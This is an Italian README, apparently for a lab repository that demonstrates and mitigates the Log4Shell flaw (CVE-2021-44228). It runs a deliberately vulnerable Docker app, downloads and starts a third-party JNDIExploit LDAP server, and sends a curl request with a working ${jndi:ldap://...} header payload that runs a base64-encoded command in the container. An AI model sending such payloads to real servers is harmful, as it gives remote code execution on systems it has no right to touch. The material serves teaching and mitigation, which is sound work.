
Questo repository serve per la dimostrazione e la mitigazione della vulnerabilità Log4j 2021 (CVE-2021-44228).
Questa repository riguarda la dimostrazione e la mitigazione della vulnerabilità Log4j 2021 (CVE-2021-44228).
La vulnerabilità CVE-2021-44228 / Log4Shell consiste nell'iniettare un payload dannoso in un software vulnerabile, che chiederà a Log4J di ottenere un valore da una fonte di terze parti, tramite JNDI e attraverso il protocollo LDAP. ... I dati importati possono essere codice, che verrà eseguito da Log4J sul sistema.
Eseguiamo un'applicazione web Spring Boot vulnerabile a CVE-2021-44228 in Docker, soprannominata Log4Shell da @christophetd.
Utilizza Log4j 2.14.1 (tramite spring-boot-starter-log4j2 2.6.1) e JDK 1.8.0_181.
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Scarichiamo lo JNDI Exploit per Log4Shell dall'archivio web in questo caso, ma puoi scaricarlo da qualsiasi luogo sia disponibile.
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

Otteniamo l'indirizzo IP della nostra macchina che esegue il docker dell'applicazione Log4Shell.
ifconfig

Decomprimiamo lo zip con lo JNDI Exploit per Log4Shell, così otteniamo il JAR e lo eseguiamo inserendo il nostro IP ottenuto nel passaggio 3.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Video su come mitigare la vulnerabilità Log4Shell in Windows e Linux: MITIGATION

Feryael Justice 2022